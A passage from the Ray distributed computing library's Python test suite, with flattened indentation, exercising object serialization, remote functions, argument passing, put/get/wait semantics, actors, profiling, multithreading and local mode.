np.float32(1.9),
np.float64(1.9),
np.zeros([100, 100]),
np.random.normal(size=[100, 100]),
np.array(["hi", 3]),
np.array(["hi", 3], dtype=object)
] + long_extras
COMPLEX_OBJECTS = [
[[[[[[[[[[[[]]]]]]]]]]]],
{
"obj{}".format(i): np.random.normal(size=[100, 100])
for i in range(10)
},
# {(): {(): {(): {(): {(): {(): {(): {(): {(): {(): {
# (): {(): {}}}}}}}}}}}}},
(
(((((((((), ), ), ), ), ), ), ), ), ),
{
"a": {
"b": {
"c": {
"d": {}
}
}
}
},
]
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
class Bar(object):
def __init__(self):
for i, val in enumerate(PRIMITIVE_OBJECTS + COMPLEX_OBJECTS):
setattr(self, "field{}".format(i), val)
class Baz(object):
def __init__(self):
self.foo = Foo()
self.bar = Bar()
def method(self, arg):
pass
class Qux(object):
def __init__(self):
self.objs = [Foo(), Bar(), Baz()]
class SubQux(Qux):
def __init__(self):
Qux.__init__(self)
class CustomError(Exception):
pass
Point = collections.namedtuple("Point", ["x", "y"])
NamedTupleExample = collections.namedtuple(
"Example", "field1, field2, field3, field4, field5")
CUSTOM_OBJECTS = [
Exception("Test object."),
CustomError(),
Point(11, y=22),
Foo(),
Bar(),
Baz(), # Qux(), SubQux(),
NamedTupleExample(1, 1.0, "hi", np.zeros([3, 5]), [1, 2, 3]),
]
# Test dataclasses in Python 3.7.
if sys.version_info >= (3, 7):
from dataclasses import make_dataclass
DataClass0 = make_dataclass("DataClass0", [("number", int)])
CUSTOM_OBJECTS.append(DataClass0(number=3))
class CustomClass(object):
def __init__(self, value):
self.value = value
DataClass1 = make_dataclass("DataClass1", [("custom", CustomClass)])
class DataClass2(DataClass1):
@classmethod
def from_custom(cls, data):
custom = CustomClass(data)
return cls(custom)
def __reduce__(self):
return (self.from_custom, (self.custom.value, ))
CUSTOM_OBJECTS.append(DataClass2(custom=CustomClass(43)))
BASE_OBJECTS = PRIMITIVE_OBJECTS + COMPLEX_OBJECTS + CUSTOM_OBJECTS
LIST_OBJECTS = [[obj] for obj in BASE_OBJECTS]
TUPLE_OBJECTS = [(obj, ) for obj in BASE_OBJECTS]
# The check that type(obj).__module__ != "numpy" should be unnecessary, but
# otherwise this seems to fail on Mac OS X on Travis.
DICT_OBJECTS = ([{
obj: obj
} for obj in PRIMITIVE_OBJECTS if (
obj.__hash__ is not None and type(obj).__module__ != "numpy")] + [{
0: obj
} for obj in BASE_OBJECTS] + [{
Foo(123): Foo(456)
}])
RAY_TEST_OBJECTS = (
BASE_OBJECTS + LIST_OBJECTS + TUPLE_OBJECTS + DICT_OBJECTS)
@ray.remote
def f(x):
return x
# Check that we can pass arguments by value to remote functions and
# that they are uncorrupted.
for obj in RAY_TEST_OBJECTS:
assert_equal(obj, ray.get(f.remote(obj)))
assert_equal(obj, ray.get(ray.put(obj)))
def test_ray_recursive_objects(ray_start):
class ClassA(object):
pass
# Make a list that contains itself.
lst = []
lst.append(lst)
# Make an object that contains itself as a field.
a1 = ClassA()
a1.field = a1
# Make two objects that contain each other as fields.
a2 = ClassA()
a3 = ClassA()
a2.field = a3
a3.field = a2
# Make a dictionary that contains itself.
d1 = {}
d1["key"] = d1
# Create a list of recursive objects.
recursive_objects = [lst, a1, a2, a3, d1]
# Check that exceptions are thrown when we serialize the recursive
# objects.
for obj in recursive_objects:
with pytest.raises(Exception):
ray.put(obj)
def test_passing_arguments_by_value_out_of_the_box(ray_start):
@ray.remote
def f(x):
return x
# Test passing lambdas.
def temp():
return 1
assert ray.get(f.remote(temp))() == 1
assert ray.get(f.remote(lambda x: x + 1))(3) == 4
# Test sets.
assert ray.get(f.remote(set())) == set()
s = {1, (1, 2, "hi")}
assert ray.get(f.remote(s)) == s
# Test types.
assert ray.get(f.remote(int)) == int
assert ray.get(f.remote(float)) == float
assert ray.get(f.remote(str)) == str
class Foo(object):
def __init__(self):
pass
# Make sure that we can put and get a custom type. Note that the result
# won't be "equal" to Foo.
ray.get(ray.put(Foo))
def test_putting_object_that_closes_over_object_id(ray_start):
# This test is here to prevent a regression of
# https://github.com/ray-project/ray/issues/1317.
class Foo(object):
def __init__(self):
self.val = ray.put(0)
def method(self):
f
f = Foo()
ray.put(f)
def test_put_get(shutdown_only):
ray.init(num_cpus=0)
for i in range(100):
value_before = i * 10**6
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = i * 10**6 * 1.0
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = "h" * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
for i in range(100):
value_before = [1] * i
objectid = ray.put(value_before)
value_after = ray.get(objectid)
assert value_before == value_after
def test_custom_serializers(shutdown_only):
ray.init(num_cpus=1)
class Foo(object):
def __init__(self):
self.x = 3
def custom_serializer(obj):
return 3, "string1", type(obj).__name__
def custom_deserializer(serialized_obj):
return serialized_obj, "string2"
ray.register_custom_serializer(
Foo, serializer=custom_serializer, deserializer=custom_deserializer)
assert ray.get(ray.put(Foo())) == ((3, "string1", Foo.__name__), "string2")
class Bar(object):
def __init__(self):
self.x = 3
ray.register_custom_serializer(
Bar, serializer=custom_serializer, deserializer=custom_deserializer)
@ray.remote
def f():
return Bar()
assert ray.get(f.remote()) == ((3, "string1", Bar.__name__), "string2")
def test_serialization_final_fallback(ray_start):
pytest.importorskip("catboost")
# This test will only run when "catboost" is installed.
from catboost import CatBoostClassifier
model = CatBoostClassifier(
iterations=2,
depth=2,
learning_rate=1,
loss_function="Logloss",
logging_level="Verbose")
reconstructed_model = ray.get(ray.put(model))
assert set(model.get_params().items()) == set(
reconstructed_model.get_params().items())
def test_register_class(shutdown_only):
ray.init(num_cpus=2)
# Check that putting an object of a class that has not been registered
# throws an exception.
class TempClass(object):
pass
ray.get(ray.put(TempClass()))
# Test passing custom classes into remote functions from the driver.
@ray.remote
def f(x):
return x
class Foo(object):
def __init__(self, value=0):
self.value = value
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
return other.value == self.value
foo = ray.get(f.remote(Foo(7)))
assert foo == Foo(7)
regex = re.compile(r"\d+\.\d*")
new_regex = ray.get(f.remote(regex))
# This seems to fail on the system Python 3 that comes with
# Ubuntu, so it is commented out for now:
# assert regex == new_regex
# Instead, we do this:
assert regex.pattern == new_regex.pattern
class TempClass1(object):
def __init__(self):
self.value = 1
# Test returning custom classes created on workers.
@ray.remote
def g():
class TempClass2(object):
def __init__(self):
self.value = 2
return TempClass1(), TempClass2()
object_1, object_2 = ray.get(g.remote())
assert object_1.value == 1
assert object_2.value == 2
# Test exporting custom class definitions from one worker to another
# when the worker is blocked in a get.
class NewTempClass(object):
def __init__(self, value):
self.value = value
@ray.remote
def h1(x):
return NewTempClass(x)
@ray.remote
def h2(x):
return ray.get(h1.remote(x))
assert ray.get(h2.remote(10)).value == 10
# Test registering multiple classes with the same name.
@ray.remote(num_return_vals=3)
def j():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = []
for _ in range(5):
results += j.remote()
for i in range(len(results) // 3):
c0, c1, c2 = ray.get(results[(3 * i):(3 * (i + 1))])
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
@ray.remote
def k():
class Class0(object):
def method0(self):
pass
c0 = Class0()
class Class0(object):
def method1(self):
pass
c1 = Class0()
class Class0(object):
def method2(self):
pass
c2 = Class0()
return c0, c1, c2
results = ray.get([k.remote() for _ in range(5)])
for c0, c1, c2 in results:
c0.method0()
c1.method1()
c2.method2()
assert not hasattr(c0, "method1")
assert not hasattr(c0, "method2")
assert not hasattr(c1, "method0")
assert not hasattr(c1, "method2")
assert not hasattr(c2, "method0")
assert not hasattr(c2, "method1")
def test_keyword_args(shutdown_only):
@ray.remote
def keyword_fct1(a, b="hello"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct2(a="hello", b="world"):
return "{} {}".format(a, b)
@ray.remote
def keyword_fct3(a, b, c="hello", d="world"):
return "{} {} {} {}".format(a, b, c, d)
ray.init(num_cpus=1)
x = keyword_fct1.remote(1)
assert ray.get(x) == "1 hello"
x = keyword_fct1.remote(1, "hi")
assert ray.get(x) == "1 hi"
x = keyword_fct1.remote(1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct1.remote(a=1, b="world")
assert ray.get(x) == "1 world"
x = keyword_fct2.remote(a="w", b="hi")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(b="hi", a="w")
assert ray.get(x) == "w hi"
x = keyword_fct2.remote(a="w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote(b="hi")
assert ray.get(x) == "hello hi"
x = keyword_fct2.remote("w")
assert ray.get(x) == "w world"
x = keyword_fct2.remote("w", "hi")
assert ray.get(x) == "w hi"
x = keyword_fct3.remote(0, 1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(a=0, b=1, c="w", d="hi")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, d="hi", c="w")
assert ray.get(x) == "0 1 w hi"
x = keyword_fct3.remote(0, 1, c="w")
assert ray.get(x) == "0 1 w world"
x = keyword_fct3.remote(0, 1, d="hi")
assert ray.get(x) == "0 1 hello hi"
x = keyword_fct3.remote(0, 1)
assert ray.get(x) == "0 1 hello world"
x = keyword_fct3.remote(a=0, b=1)
assert ray.get(x) == "0 1 hello world"
# Check that we cannot pass invalid keyword arguments to functions.
@ray.remote
def f1():
return
@ray.remote
def f2(x, y=0, z=0):
return
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f1.remote(3)
with pytest.raises(Exception):
f1.remote(x=3)
with pytest.raises(Exception):
f2.remote(0, w=0)
with pytest.raises(Exception):
f2.remote(3, x=3)
# Make sure we get an exception if too many arguments are passed in.
with pytest.raises(Exception):
f2.remote(1, 2, 3, 4)
@ray.remote
def f3(x):
return x
assert ray.get(f3.remote(4)) == 4
def test_variable_number_of_args(shutdown_only):
@ray.remote
def varargs_fct1(*a):
return " ".join(map(str, a))
@ray.remote
def varargs_fct2(a, *b):
return " ".join(map(str, b))
try:
@ray.remote
def kwargs_throw_exception(**c):
return ()
kwargs_exception_thrown = False
except Exception:
kwargs_exception_thrown = True
ray.init(num_cpus=1)
x = varargs_fct1.remote(0, 1, 2)
assert ray.get(x) == "0 1 2"
x = varargs_fct2.remote(0, 1, 2)
assert ray.get(x) == "1 2"
assert kwargs_exception_thrown
@ray.remote
def f1(*args):
return args
@ray.remote
def f2(x, y, *args):
return x, y, args
assert ray.get(f1.remote()) == ()
assert ray.get(f1.remote(1)) == (1, )
assert ray.get(f1.remote(1, 2, 3)) == (1, 2, 3)
with pytest.raises(Exception):
f2.remote()
with pytest.raises(Exception):
f2.remote(1)
assert ray.get(f2.remote(1, 2)) == (1, 2, ())
assert ray.get(f2.remote(1, 2, 3)) == (1, 2, (3, ))
assert ray.get(f2.remote(1, 2, 3, 4)) == (1, 2, (3, 4))
def testNoArgs(self):
@ray.remote
def no_op():
pass
self.init_ray()
ray.get(no_op.remote())
def test_defining_remote_functions(shutdown_only):
ray.init(num_cpus=3)
# Test that we can define a remote function in the shell.
@ray.remote
def f(x):
return x + 1
assert ray.get(f.remote(0)) == 1
# Test that we can redefine the remote function.
@ray.remote
def f(x):
return x + 10
while True:
val = ray.get(f.remote(0))
assert val in [1, 10]
if val == 10:
break
else:
logger.info("Still using old definition of f, trying again.")
# Test that we can close over plain old data.
data = [
np.zeros([3, 5]), (1, 2, "a"), [0.0, 1.0, 1 << 62], 1 << 60, {
"a": np.zeros(3)
}
]
@ray.remote
def g():
return data
ray.get(g.remote())
# Test that we can close over modules.
@ray.remote
def h():
return np.zeros([3, 5])
assert np.alltrue(ray.get(h.remote()) == np.zeros([3, 5]))
@ray.remote
def j():
return time.time()
ray.get(j.remote())
# Test that we can define remote functions that call other remote
# functions.
@ray.remote
def k(x):
return x + 1
@ray.remote
def k2(x):
return ray.get(k.remote(x))
@ray.remote
def m(x):
return ray.get(k2.remote(x))
assert ray.get(k.remote(1)) == 2
assert ray.get(k2.remote(1)) == 2
assert ray.get(m.remote(1)) == 2
def test_submit_api(shutdown_only):
ray.init(num_cpus=1, num_gpus=1, resources={"Custom": 1})
@ray.remote
def f(n):
return list(range(n))
@ray.remote
def g():
return ray.get_gpu_ids()
assert f._remote([0], num_return_vals=0) is None
id1 = f._remote(args=[1], num_return_vals=1)
assert ray.get(id1) == [0]
id1, id2 = f._remote(args=[2], num_return_vals=2)
assert ray.get([id1, id2]) == [0, 1]
id1, id2, id3 = f._remote(args=[3], num_return_vals=3)
assert ray.get([id1, id2, id3]) == [0, 1, 2]
assert ray.get(
g._remote(
args=[], num_cpus=1, num_gpus=1,
resources={"Custom": 1})) == [0]
infeasible_id = g._remote(args=[], resources={"NonexistentCustom": 1})
ready_ids, remaining_ids = ray.wait([infeasible_id], timeout=0.05)
assert len(ready_ids) == 0
assert len(remaining_ids) == 1
@ray.remote
class Actor(object):
def __init__(self, x, y=0):
self.x = x
self.y = y
def method(self, a, b=0):
return self.x, self.y, a, b
def gpu_ids(self):
return ray.get_gpu_ids()
a = Actor._remote(
args=[0], kwargs={"y": 1}, num_gpus=1, resources={"Custom": 1})
id1, id2, id3, id4 = a.method._remote(
args=["test"], kwargs={"b": 2}, num_return_vals=4)
assert ray.get([id1, id2, id3, id4]) == [0, 1, "test", 2]
def test_get_multiple(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
assert ray.get(object_ids) == list(range(10))
# Get a random choice of object IDs with duplicates.
indices = list(np.random.choice(range(10), 5))
indices += indices
results = ray.get([object_ids[i] for i in indices])
assert results == indices
def test_get_multiple_experimental(shutdown_only):
ray.init(num_cpus=1)
object_ids = [ray.put(i) for i in range(10)]
object_ids_tuple = tuple(object_ids)
assert ray.experimental.get(object_ids_tuple) == list(range(10))
object_ids_nparray = np.array(object_ids)
assert ray.experimental.get(object_ids_nparray) == list(range(10))
def test_get_dict(shutdown_only):
ray.init(num_cpus=1)
d = {str(i): ray.put(i) for i in range(5)}
for i in range(5, 10):
d[str(i)] = i
result = ray.experimental.get(d)
expected = {str(i): i for i in range(10)}
assert result == expected
def test_wait(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
ready_ids, remaining_ids = ray.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
ready_ids, remaining_ids = ray.wait(objectids, num_returns=4)
assert set(ready_ids) == set(objectids)
assert remaining_ids == []
objectids = [f.remote(0.5), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=1.75, num_returns=4)
assert time.time() - start_time < 2
assert len(ready_ids) == 3
assert len(remaining_ids) == 1
ray.wait(objectids)
objectids = [f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5)]
start_time = time.time()
ready_ids, remaining_ids = ray.wait(objectids, timeout=5.0)
assert time.time() - start_time < 5
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
# Verify that calling wait with duplicate object IDs throws an
# exception.
x = ray.put(1)
with pytest.raises(Exception):
ray.wait([x, x])
# Make sure it is possible to call wait with an empty list.
ready_ids, remaining_ids = ray.wait([])
assert ready_ids == []
assert remaining_ids == []
# Test semantics of num_returns with no timeout.
oids = [ray.put(i) for i in range(10)]
(found, rest) = ray.wait(oids, num_returns=2)
assert len(found) == 2
assert len(rest) == 8
# Verify that incorrect usage raises a TypeError.
x = ray.put(1)
with pytest.raises(TypeError):
ray.wait(x)
with pytest.raises(TypeError):
ray.wait(1)
with pytest.raises(TypeError):
ray.wait([1])
def test_wait_iterables(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
objectids = (f.remote(1.0), f.remote(0.5), f.remote(0.5), f.remote(0.5))
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
objectids = np.array(
[f.remote(1.0),
f.remote(0.5),
f.remote(0.5),
f.remote(0.5)])
ready_ids, remaining_ids = ray.experimental.wait(objectids)
assert len(ready_ids) == 1
assert len(remaining_ids) == 3
def test_multiple_waits_and_gets(shutdown_only):
# It is important to use three workers here, so that the three tasks
# launched in this experiment can run at the same time.
ray.init(num_cpus=3)
@ray.remote
def f(delay):
time.sleep(delay)
return 1
@ray.remote
def g(l):
# The argument l should be a list containing one object ID.
ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.tests.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
